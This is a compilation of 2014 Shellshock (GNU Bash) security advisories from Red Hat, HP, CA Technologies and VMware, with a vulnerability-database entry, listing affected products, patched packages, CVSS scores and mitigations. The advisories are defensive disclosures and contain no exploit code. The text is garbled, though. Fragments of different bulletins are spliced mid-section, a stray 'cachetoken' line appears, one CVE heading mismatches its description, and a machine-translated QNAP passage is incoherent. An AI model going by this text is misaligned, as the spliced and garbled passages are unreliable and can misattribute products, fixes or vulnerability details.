Red Hat Enterprise Linux EUS (v. 5.9 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux HPC Node EUS (v. 6.4) - x86_64
Red Hat Enterprise Linux LL (v. 5.6 server) - i386, ia64, x86_64
Red Hat Enterprise Linux Server EUS (v. 6.4) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional AUS (v. 6.2) - x86_64
Red Hat Enterprise Linux Server Optional EUS (v. 6.4) - i386, ppc64, s390x, x86_64
3. Description:
The GNU Bourne Again shell (Bash) is a shell and command language
interpreter compatible with the Bourne shell (sh). Bash is the default
shell for Red Hat Enterprise Linux.
It was found that the fix for CVE-2014-6271 was incomplete, and Bash still
allowed certain characters to be injected into other environments via
specially crafted environment variables. An attacker could potentially use
this flaw to override or bypass environment restrictions to execute shell
commands. Certain services and applications allow remote unauthenticated
attackers to provide environment variables, allowing them to exploit this
issue. (CVE-2014-7169)
Applications which directly create Bash functions as environment variables
need to be made aware of the changes to the way names are handled by this
update. For more information see the Knowledgebase article at
https://access.redhat.com/articles/1200223
Note: Docker users are advised to use "yum update" within their containers,
and to commit the resulting changes.
For additional information on CVE-2014-6271 and CVE-2014-7169, refer to the
aforementioned Knowledgebase article.
All bash users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Enterprise Linux AS (v. 4 ELS):
Source:
bash-3.0-27.el4.4.src.rpm
i386:
bash-3.0-27.el4.4.i386.rpm
bash-debuginfo-3.0-27.el4.4.i386.rpm
ia64:
bash-3.0-27.el4.4.i386.rpm
bash-3.0-27.el4.4.ia64.rpm
bash-debuginfo-3.0-27.el4.4.i386.rpm
bash-debuginfo-3.0-27.el4.4.ia64.rpm
x86_64:
bash-3.0-27.el4.4.x86_64.rpm
bash-debuginfo-3.0-27.el4.4.x86_64.rpm
Red Hat Enterprise Linux ES (v. 4 ELS):
Source:
bash-3.0-27.el4.4.src.rpm
i386:
bash-3.0-27.el4.4.i386.rpm
bash-debuginfo-3.0-27.el4.4.i386.rpm
x86_64:
bash-3.0-27.el4.4.x86_64.rpm
bash-debuginfo-3.0-27.el4.4.x86_64.rpm
Red Hat Enterprise Linux LL (v. 5.6 server):
Source:
bash-3.2-24.el5_6.2.src.rpm
i386:
bash-3.2-24.el5_6.2.i386.rpm
bash-debuginfo-3.2-24.el5_6.2.i386.rpm
ia64:
bash-3.2-24.el5_6.2.i386.rpm
bash-3.2-24.el5_6.2.ia64.rpm
bash-debuginfo-3.2-24.el5_6.2.i386.rpm
bash-debuginfo-3.2-24.el5_6.2.ia64.rpm
x86_64:
bash-3.2-24.el5_6.2.x86_64.rpm
bash-debuginfo-3.2-24.el5_6.2.x86_64.rpm
Red Hat Enterprise Linux EUS (v. 5.9 server):
Source:
bash-3.2-32.el5_9.3.src.rpm
i386:
bash-3.2-32.el5_9.3.i386.rpm
bash-debuginfo-3.2-32.el5_9.3.i386.rpm
ia64:
bash-3.2-32.el5_9.3.i386.rpm
bash-3.2-32.el5_9.3.ia64.rpm
bash-debuginfo-3.2-32.el5_9.3.i386.rpm
bash-debuginfo-3.2-32.el5_9.3.ia64.rpm
ppc:
bash-3.2-32.el5_9.3.ppc.rpm
bash-debuginfo-3.2-32.el5_9.3.ppc.rpm
s390x:
bash-3.2-32.el5_9.3.s390x.rpm
bash-debuginfo-3.2-32.el5_9.3.s390x.rpm
x86_64:
bash-3.2-32.el5_9.3.x86_64.rpm
bash-debuginfo-3.2-32.el5_9.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node EUS (v. 6.4):
Source:
bash-4.1.2-15.el6_4.2.src.rpm
x86_64:
bash-4.1.2-15.el6_4.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm
Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.4):
Source:
bash-4.1.2-15.el6_4.2.src.rpm
x86_64:
bash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm
bash-doc-4.1.2-15.el6_4.2.x86_64.rpm
Red Hat Enterprise Linux AUS (v. 6.2 server):
Source:
bash-4.1.2-9.el6_2.2.src.rpm
x86_64:
bash-4.1.2-9.el6_2.2.x86_64.rpm
bash-debuginfo-4.1.2-9.el6_2.2.x86_64.rpm
Red Hat Enterprise Linux Server EUS (v. 6.4):
Source:
bash-4.1.2-15.el6_4.2.src.rpm
i386:
bash-4.1.2-15.el6_4.2.i686.rpm
bash-debuginfo-4.1.2-15.el6_4.2.i686.rpm
ppc64:
bash-4.1.2-15.el6_4.2.ppc64.rpm
bash-debuginfo-4.1.2-15.el6_4.2.ppc64.rpm
s390x:
bash-4.1.2-15.el6_4.2.s390x.rpm
bash-debuginfo-4.1.2-15.el6_4.2.s390x.rpm
x86_64:
bash-4.1.2-15.el6_4.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm
Red Hat Enterprise Linux Server Optional AUS (v. 6.2):
Source:
bash-4.1.2-9.el6_2.2.src.rpm
x86_64:
bash-debuginfo-4.1.2-9.el6_2.2.x86_64.rpm
bash-doc-4.1.2-9.el6_2.2.x86_64.rpm
Red Hat Enterprise Linux Server Optional EUS (v. 6.4):
Source:
bash-4.1.2-15.el6_4.2.src.rpm
i386:
bash-debuginfo-4.1.2-15.el6_4.2.i686.rpm
bash-doc-4.1.2-15.el6_4.2.i686.rpm
ppc64:
bash-debuginfo-4.1.2-15.el6_4.2.ppc64.rpm
bash-doc-4.1.2-15.el6_4.2.ppc64.rpm
s390x:
bash-debuginfo-4.1.2-15.el6_4.2.s390x.rpm
bash-doc-4.1.2-15.el6_4.2.s390x.rpm
x86_64:
bash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm
bash-doc-4.1.2-15.el6_4.2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-7169.html
https://www.redhat.com/security/data/cve/CVE-2014-7186.html
https://www.redhat.com/security/data/cve/CVE-2014-7187.html
https://access.redhat.com/security/updates/classification/#important
https://access.redhat.com/articles/1200223
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFUJau9XlSAg2UNWIIRAhKkAKC931kAxA4S4exwT4uGhDr7uDFIKQCglKKS
N0AJiOto/RXwBqHtbfr1wkM=
=SeAK
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
.
HP Vertica AMI's and Virtual Machines prior to v7.1.1-0.
BACKGROUND
HP Vertica AMI's and Virtual Machines prior to v7.1.1-0 include a vulnerable
version of the Bash shell.
HP has released the following updates to resolve this vulnerability for HP
Vertica products.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile
to update appropriate sections. HP is continually reviewing and enhancing the
security features of software products to provide customers with current
secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the
attention of users of the affected HP products the important security
information contained in this Bulletin. HP recommends that all users
determine the applicability of this information to their individual
situations and take appropriate action. HP does not warrant that this
information is necessarily accurate or complete for all user situations and,
consequently, HP will not be responsible for any damages resulting from
user's use or disregard of the information provided in this Bulletin. To the
extent permitted by law, HP disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose, title and non-infringement."
Copyright 2014 Hewlett-Packard Development Company, L.P.
This vulnerability allows users that have been granted access to a shell
script to escalate privilege and execute unrestricted commands at the same
security level as the Bash script.
cachetoken
NOTE: HP strongly recommends implementing the following security best
practices to help reduce both known and future security vulnerability risks:
Isolate the HP Integrity Server's management network by keeping it separate
from the data or production network, and not connecting it directly to the
Internet without additional access authentication.
Patch and maintain Lightweight Directory Access Protocol (LDAP) and web
servers.
Use virus scanners, intrusion detection/prevention systems (IDS/IPS), and
vulnerability scanners regularly.
Note: all versions of HP Thin Pro and HP Smart Zero Core operating systems
prior to version 5.1.0 are affected by this vulnerability.
If you participated in the ThinPro 5.1.0 beta program upgrade to the release
version as soon as it becomes available.
The update can be also downloaded directly from ftp://ftp.hp.com/pub/tcdebian
/updates/5.0/service_packs/SecurityUpdate-CVE20146271-CVE20147169-all-5.0-x86
.xar
Or via softpaq delivery at:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe
HP ThinPro and HP Smart Zero Core (x86)
v4.4.x
A component update is currently available through Easy Update as:
SecurityUpdate-CVE20146271-CVE20147169-all-4.4-x86.xar .
Or can be downloaded directly from ftp://ftp.hp.com/pub/tcdebian/updates/4.4/
service_packs/SecurityUpdate-CVE20146271-CVE20147169-all-4.4-x86.xar
Or via softpaq delivery at:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe
HP ThinPro and HP Smart Zero Core (ARM)
v4.4.x
A component update is currently available through Easy Update as:
SecurityUpdate-CVE20146271-CVE20147169-all-4.4-arm.xar . This bulletin will be revised when the software update is
released
| VAR-201409-1148 | CVE-2014-7187 | GNU Bash shell executes commands in exported functions in environment variables |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the "word_lineno" issue. QNAP Systems, Inc. Provided by QTS teeth, Turbo NAS for OS is. QTS for, GNU Bash Vulnerability (JVNVU#97219505) caused by OS Command injection vulnerability (CWE-78) Exists. This vulnerability information is based on the Information Security Early Warning Partnership. IPA Report to JPCERT/CC Coordinated with the developer. Reporter : University of Electro-Communications Wakisaka Yuki MrAny application permission OS The command may be executed.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
GNU Bash 3.2 and later are vulnerable; prior versions may also be affected.
Existing users may upgrade to HP OneView version 1.20 using the Update
Appliance feature in HP OneView.
-----BEGIN PGP SIGNED MESSAGE-----
CA20141001-01: Security Notice for Bash Shellshock Vulnerability
Issued: October 01, 2014
Updated: October 03, 2014
CA Technologies is investigating multiple GNU Bash vulnerabilities,
referred to as the "Shellshock" vulnerabilities, which were publicly
disclosed on September 24-27, 2014. CVE identifiers CVE-2014-6271,
CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and
CVE-2014-6278 have been assigned to these vulnerabilities.
The CA Technologies Enterprise Information Security team has led a
global effort to identify and remediate systems and products discovered
with these vulnerabilities. We continue to patch our systems as fixes
become available, and we are providing fixes for affected CA
Technologies products.
CA Technologies continues to aggressively scan our environments
(including servers, networks, external facing applications, and SaaS
environments) to proactively monitor, identify, and remediate any
vulnerability when necessary.
Risk Rating
High
Platform
AIX
Android (not vulnerable, unless rooted)
Apple iOS (not vulnerable unless jailbroken)
Linux
Mac OS X
Solaris
Windows (not vulnerable unless Cygwin or similar ported Linux tools
with Bash shell are installed)
Other UNIX/BSD based systems if Bash is installed
Any other OS or JeOS that utilizes Bash
Affected Products
The following products have been identified as potentially vulnerable,
and we have made fixes available for all of these products.
CA API Management (Linux appliance only)
CA Application Performance Management (TIM is the only affected APM
component)
CA Application Performance Management Cloud Monitor
CA Customer Experience Manager (CEM) Transaction Impact Monitor (TIM)
CA Layer 7 products (API Gateway, Mobile Access Gateway, API Management
Portal)
CA User Activity Reporting Module (Enterprise Log Manager)
Note: This security notice will be updated if other CA Technologies
products are determined to be vulnerable.
In most cases, the Bash vulnerabilities will need to be patched by OS
vendors. Exceptions may include CA Technologies appliances, and
software products that include Linux, UNIX or Mac OS X based operating
systems (that include Bash).
Affected Components
CentOS
Cygwin
GNU Bash
Red Hat Enterprise Linux
SUSE Linux
Non-Affected Products
IMPORTANT NOTE: This listing includes only a small subset of the
unaffected CA Technologies products. We're including unaffected
products that customers have already inquired about. While the
following CA Technologies products are not directly affected by the
Bash vulnerabilities, the underlying operating systems that CA
Technologies software is installed on may be vulnerable. We strongly
encourage our customers to follow the recommendations provided by their
vendors for all operating systems they utilize.
All CA SaaS / On Demand products were either not vulnerable or have
already been patched.
CA AHS / PaymentMinder - AHS App is not vulnerable. The AHS app does
not execute CGI scripts, or spawn or execute shell commands from within
the app. AHS infrastructure already patched.
CA Asset Portfolio Management
CA AuthMinder (Arcot WebFort)
CA AuthMinder for Business Users
CA AuthMinder for Consumers
CA AutoSys products - We use the bash shell that comes with the
operating system and the customer is responsible for patching their OS.
Additionally, the agents themselves do not distribute any scripts that
use bash.
CA Clarity On Demand
CA CloudMinder - CloudMinder does not include the Bash Shell in BoM, or
use it, but because we are deployed on RHEL, customers may be
indirectly affected. Customers using RHEL should apply patches provided
by Red Hat.
CA Console Management for OpenVMS - Our OpenVMS products do not bundle
bash, and they do not supply bash scripts; we use nothing but the
native DCL CLI.
CA ControlMinder
CA DataMinder (formerly DLP) products – Software and appliance
confirmed not vulnerable. Note: Linux Agents shipped, but no public SSH
or Web apps are used in these agents. Customers should patch bash shell
on any Linux server with DataMinder agents. DataMinder agents should
continue to function normally.
CA Digital Payments SaaS (previously patched)
CA Directory
CA eCommerce SaaS / On Demand (previously patched)
CA Endevor Software Change Manager
CA Federation (formerly SiteMinder Federation)
CA GovernanceMinder
CA IdentityMinder
CA Infrastructure Management
CA JCLCheck
CA Job Management for OpenVMS - Our OpenVMS products do not bundle
bash, and they do not supply bash scripts; we use nothing but the
native DCL CLI.
CA NetQoS GigaStor Observer Expert
CA Network Flow Analysis
CA Performance Management for OpenVMS - Our OpenVMS products do not
bundle bash, and they do not supply bash scripts; we use nothing but
the native DCL CLI.
CA RiskMinder
CA Service Desk Manager
CA Service Operations Insight (SOI)
CA SiteMinder
CA SOLVE:Access
CA Spectrum for Linux - Not vulnerable. Be sure to apply bash fixes
from your underlying operating system vendor.
CA Strong Authentication
CA System Watchdog for OpenVMS - Our OpenVMS products do not bundle
bash, and they do not supply bash scripts; we use nothing but the
native DCL CLI.
CA Top Secret
CA Universal Job Management Agent for OpenVMS - Our OpenVMS products do
not bundle bash, and they do not supply bash scripts; we use nothing
but the native DCL CLI.
CA Virtual Assurance for Infrastructure Managers (VAIM)
Solution
CA Technologies has issued the following fixes to address the
vulnerabilities.
CA API Management:
Patches for Linux appliance are available through CA Support to
customers of Gateway (applicable for all versions – 6.1.5, 6.2, 7.0,
7.1, 8.0, 8.1, 8.1.1, 8.1.02).
CA Application Performance Management:
KB article for APM TIM has been published. APM TIM is the only part of
APM that was affected. Refer to TEC618037.
CA Application Performance Management Cloud Monitor:
New images are available for subscribers. Download the latest OPMS
version 8.2.1.5. For assistance, contact CA Support.
CA Customer Experience Manager (CEM) Transaction Impact Monitor (TIM):
Very low risk. 9.6 is not affected. 9.5 Installation uses Bash. We do
not use Bash at all for the CEM operating system that we have shipped
in the past. This means that customers who patch the OS will not impact
the ability of the CEM TIMsoft from operating. However prior to version
9.6, the TIM installation script does use the bash shell. See new KB
article TEC618037 for additional information.
CA Layer 7 (API Gateway, Mobile Access Gateway, API Management Portal):
Fixes for all Bash vulnerabilities and a security bulletin are available
on the Layer 7 Support website.
CA User Activity Reporting Module (Enterprise Log Manager):
All 12.5 and 12.6 GA versions are potentially affected. Patches
provided on 2014-09-30. To get the patch, use the OS update
functionality to get the latest R12.6 SP1 subscription update. Note
that you can update R12.5 SPx with the R12.6 SP1 OS update. For
assistance, contact CA Support.
Workaround
None
To help mitigate the risk, we do strongly encourage all customers to
follow patch management best practices, and in particular for operating
systems affected by the Bash Shellshock vulnerabilities.
References
CVE-2014-6271 - Bash environment variable command injection
CVE-2014-7169 - Bash environment variable incomplete fix for CVE-2014-6271
CVE-2014-7186 - Bash parser redir_stack memory corruption
CVE-2014-7187 - Bash nested flow control constructs off-by-one
CVE-2014-6277 - Bash untrusted pointer use uninitialized memory
CVE-2014-6278 - Bash environment variable command injection
CA20141001-01: Security Notice for Bash Shellshock Vulnerability
https://support.ca.com/irj/portal/anonymous/phpsbpldgpg
Change History
v1.0: 2014-10-01, Initial Release
v1.1: 2014-10-02, Added AuthMinder, Strong Authentication, VAIM,
Clarity OD, All SaaS/OD products to list of Non-Affected Products.
v1.2: 2014-10-03, Added RiskMinder to Non-Affected Products. Updated
UARM solution info.
If additional information is required, please contact CA Technologies
Support at https://support.ca.com.
If you discover a vulnerability in CA Technologies products, please
report your findings to the CA Technologies Product Vulnerability
Response Team at vuln@ca.com.
PGP key:
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Security Notices
https://support.ca.com/irj/portal/anonymous/phpsbpldgpg
Regards,
Ken Williams
Director, Product Vulnerability Response Team
CA Technologies | One CA Plaza | Islandia, NY 11749 | www.ca.com
Ken.Williams@ca.com | vuln@ca.com
Copyright © 2014 CA. All Rights Reserved. One CA Plaza, Islandia, N.Y.
11749. All other trademarks, trade names, service marks, and logos
referenced herein belong to their respective companies.
-----BEGIN PGP SIGNATURE-----
Version: Encryption Desktop 10.3.2 (Build 15238)
Charset: utf-8
wsBVAwUBVDK+PZI1FvIeMomJAQFl/Af/TqrSE/h4r3gs9PwrWKdt21PCRI3za9Lx
M5ZyTdVDIQ9ybgPkLqsovNRPgVqd7zwDHsx0rzvF5Y82uO+vQ63BuEV2GnczAax/
EiAW4WVxUgWG+lAowGV55Of8ruv/gOiAWTjFhkqpsyVg96ZMw2HLG62IwZL1j0qa
oLCu0y3VrGvqH0g2hi75QwHAjNCdlEsD4onUqTCc9cRTdLwFCZrUQ8KTrqIL7LK5
Uo5T9C1UeAyNTo3KiJ/zw3BCOTkpl99dmg3NW0onU/1r1CXdlyS7opLB+GJ+xGwP
xRQdUsOIhzfRzx7bsao2D43IhDnzJBBFJHdeMPo18WBTfJ7aUgBwGQ==
=B62b
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: rhev-hypervisor6 security update
Advisory ID: RHSA-2014:1354-01
Product: Red Hat Enterprise Virtualization
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1354.html
Issue date: 2014-10-02
CVE Names: CVE-2014-1568 CVE-2014-6271 CVE-2014-7169
CVE-2014-7186 CVE-2014-7187
=====================================================================
1. Summary:
An updated rhev-hypervisor6 package that fixes several security issues is
now available.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section. Relevant releases/architectures:
RHEV-M 3.4 - noarch
3. Description:
The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization
Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor
is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes
everything necessary to run and manage virtual machines: a subset of the
Red Hat Enterprise Linux operating environment and the Red Hat Enterprise
Virtualization Agent.
Note: Red Hat Enterprise Virtualization Hypervisor is only available for
the Intel 64 and AMD64 architectures with virtualization extensions.
A flaw was found in the way Bash evaluated certain specially crafted
environment variables. An attacker could use this flaw to override or
bypass environment restrictions to execute shell commands. Certain services
and applications allow remote unauthenticated attackers to provide
environment variables, allowing them to exploit this issue. (CVE-2014-6271)
It was found that the fix for CVE-2014-6271 was incomplete, and Bash still
allowed certain characters to be injected into other environments via
specially crafted environment variables. An attacker could potentially use
this flaw to override or bypass environment restrictions to execute shell
commands. Certain services and applications allow remote unauthenticated
attackers to provide environment variables, allowing them to exploit this
issue. (CVE-2014-7169)
A flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One)
input from certain RSA signatures. (CVE-2014-1568)
It was discovered that the fixed-sized redir_stack could be forced to
overflow in the Bash parser, resulting in memory corruption, and possibly
leading to arbitrary code execution when evaluating untrusted input that
would not otherwise be run as code. (CVE-2014-7186)
An off-by-one error was discovered in the way Bash was handling deeply
nested flow control constructs. (CVE-2014-7187)
Red Hat would like to thank Stephane Chazelas for reporting CVE-2014-6271,
and the Mozilla project for reporting CVE-2014-1568. Upstream acknowledges
Antoine Delignat-Lavaud and Intel Product Security Incident Response Team
as the original reporters of CVE-2014-1568.
Users of the Red Hat Enterprise Virtualization Hypervisor are advised to
upgrade to this updated package. Package List:
RHEV-M 3.4:
Source:
rhev-hypervisor6-6.5-20140930.1.el6ev.src.rpm
noarch:
rhev-hypervisor6-6.5-20140930.1.el6ev.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-1568.html
https://www.redhat.com/security/data/cve/CVE-2014-6271.html
https://www.redhat.com/security/data/cve/CVE-2014-7169.html
https://www.redhat.com/security/data/cve/CVE-2014-7186.html
https://www.redhat.com/security/data/cve/CVE-2014-7187.html
https://access.redhat.com/security/updates/classification/#critical
8. All
MDS and Nexus 5K switches can function in this configuration. Access is
available through the console port.
This vulnerability allows users that have been granted access to a shell
script to escalate privilege and execute unrestricted commands at the same
security level as the Bash script. This bulletin will be revised when the
update is available.
MITIGATION INFORMATION
HP recommends the following steps to reduce the risk of this
vulnerability:
- Place the HP StoreFabric H-series switch and other data center
critical infrastructure behind a firewall to disallow access from the
Internet.
- Change all HP StoreFabric switch default account passwords, including
the root passwords, from the default factory passwords.
- Examine the list of accounts, including ones on the switch and those
existing on remote authentication servers such as RADIUS, LDAP, and TACAS+,
to ensure only necessary personnel can gain access to HP StoreFabric H-series
switches. Delete guest accounts and temporary accounts created for one-time
usage needs.
- To avoid possible exploit through the embedded web GUI, QuickTools,
disable the web server with the following procedure:
NOTE: After completing this procedure, the user will not be able to
manage the switch using QuickTools. Login to the Command Line Interface (CLI). Execute the "admin start" command to enter into an admin session. Execute the "set setup services" command and change setting for
EmbeddedGUIEnabled to "False".
HISTORY
Version:1 (rev.1) - 11 November 2014 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Release Date: 2014-12-16
Last Updated: 2014-12-16
Potential Security Impact: Remote code execution
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Vertica.
References:
CVE-2014-6271
CVE-2014-6277
CVE-2014-6278
CVE-2014-7169
CVE-2014-7186
CVE-2014-7187
SSRT101827
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Vertica AMI's and Virtual Machines prior to v7.1.1-0.
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2104-6277 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2104-6278 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
We recommend installing Vertica v7.1.1-0 or subsequent, or manually
installing a new version of Bash, such as Bash43-027.
HP has released the following updates to resolve this vulnerability for HP
Vertica products.
Update to the latest VM image available at: https://my.vertica.com
For customers using the AMI version HP Vertica Analytics platform, please
install the latest image available at Amazon.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being
communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins
via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG
&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
- check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile
to update appropriate sections.
To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin relates to is
represented by the 5th and 6th characters of the Bulletin number in the
title: GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to
maintain system integrity. HP is continually reviewing and enhancing the
security features of software products to provide customers with current
secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the
attention of users of the affected HP products the important security
information contained in this Bulletin. HP recommends that all users
determine the applicability of this information to their individual
situations and take appropriate action. HP does not warrant that this
information is necessarily accurate or complete for all user situations and,
consequently, HP will not be responsible for any damages resulting from
user's use or disregard of the information provided in this Bulletin. To the
extent permitted by law, HP disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose, title and non-infringement."
Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for incidental,
special or consequential damages including downtime cost; lost profits;
damages relating to the procurement of substitute products or services; or
damages for loss of data, or software restoration. The information in this
document is subject to change without notice. Relevant Releases (Affected products for which remediation is present)
vCenter Log Insight 2.0
3. Problem Description
a. Bash update for multiple products.
Bash libraries have been updated in multiple products to resolve
multiple critical security issues, also referred to as Shellshock.
VMware products have been grouped into the following four
product categories:
I) ESXi and ESX Hypervisor
ESXi is not affected because ESXi uses the Ash shell (through
busybox), which is not affected by the vulnerability reported
for the Bash shell. See table 1 for
remediation for ESX.
II) Windows-based products
Windows-based products, including all versions of vCenter Server
running on Windows, are not affected.
III) VMware (virtual) appliances
VMware (virtual) appliances ship with an affected version of Bash.
See table 2 for remediation for appliances.
IV) Products that run on Linux, Android, OSX or iOS (excluding
virtual
appliances)
Products that run on Linux, Android, OSX or iOS (excluding
virtual appliances) might use the Bash shell that is part of the
operating system.
MITIGATIONS
VMware encourages restricting access to appliances through
firewall rules and other network layer controls to only trusted IP
addresses. This measure will greatly reduce any risk to these
appliances.
RECOMMENDATIONS
VMware recommends customers evaluate and deploy patches for
affected products in Table 1 and 2 below as these
patches become available.
Column 4 of the following tables lists the action required to
remediate the vulnerability in each release, if a solution is
available.
Table 1 - ESXi and ESX Hypervisor
=================================
VMware Product Running Replace with/
Product Version on Apply Patch
============== ======= ======= =============
ESXi any ESXi Not affected
ESX 4.1 ESX Patch pending *
ESX 4.0 ESX Patch pending *
* VMware will make VMware ESX 4.0 and 4.1 security patches available
for the Bash shell vulnerability. This security patch release is an
exception to the existing VMware lifecycle policy.
Table 2 - Products that are shipped as a (virtual) appliance.
=============================================================
VMware Product Running Replace with/
Product Version on Apply Patch
============== ======= ======= =============
vCenter Server Appliance 5.x Linux Patch Pending
Horizon DaaS Platform 6.x Linux Patch Pending
Horizon Workspace 1.x, 2.x Linux Patch Pending
IT Business Management Suite 1.x Linux Patch Pending
NSX for Multi-Hypervisor 4.x Linux Patch Pending
NSX for vSphere 6.x Linux Patch Pending
NVP 3.x Linux Patch Pending
vCenter Converter Standalone 5.x Linux Patch Pending
vCenter Hyperic Server 5.x Linux Patch Pending
vCenter Infrastructure Navigator 5.x Linux Patch Pending
vCenter Log Insight 1.x, 2.x Linux 2.0 U1
vCenter Operations Manager 5.x Linux Patch Pending
vCenter Orchestrator Appliance 4.x, 5.x Linux Patch Pending
vCenter Site Recovery Manager 5.x Linux Patch Pending
**
vCenter Support Assistant 5.x Linux Patch Pending
vCloud Automation Center 6.x Linux Patch Pending
vCloud Automation Center
Application Services 6.x Linux Patch Pending
vCloud Director Appliance 5.x Linux Patch Pending
vCloud Connector 2.x Linux Patch Pending
vCloud Networking and Security 5.x Linux Patch Pending
vCloud Usage Meter 3.x Linux Patch Pending
vFabric Application Director 5.x, 6.x Linux Patch Pending
vFabric Postgres 9.x Linux Patch Pending
Viewplanner 3.x Linux Patch Pending
VMware Application Dependency
Planner x.x Linux Patch Pending
VMware Data Recovery 2.x Linux Patch Pending
VMware HealthAnalyzer 5.x Linux Patch Pending
VMware Mirage Gateway 5.x Linux Patch Pending
VMware Socialcast On Premise x.x Linux Patch Pending
VMware Studio 2.x Linux Patch Pending
VMware TAM Data Manager x.x Linux Patch Pending
VMware Workbench 3.x Linux Patch Pending
vSphere App HA 1.x Linux Patch Pending
vSphere Big Data Extensions 1.x, 2.x Linux Patch Pending
vSphere Data Protection 5.x Linux Patch Pending
vSphere Management Assistant 5.x Linux Patch Pending
vSphere Replication 5.x Linux Patch Pending
vSphere Storage Appliance 5.x Linux Patch Pending
** This product includes Virtual Appliances that will be updated, the
product
itself is not a Virtual Appliance. Solution
vCenter Log Insight
----------------------------
Downloads:
https://www.vmware.com/go/download-vcenter-log-insight
(click Go to Downloads)
Documentation:
http://kb.vmware.com/kb/2091065
5. References
VMware Knowledge Base Article 2090740
http://kb.vmware.com/kb/2090740
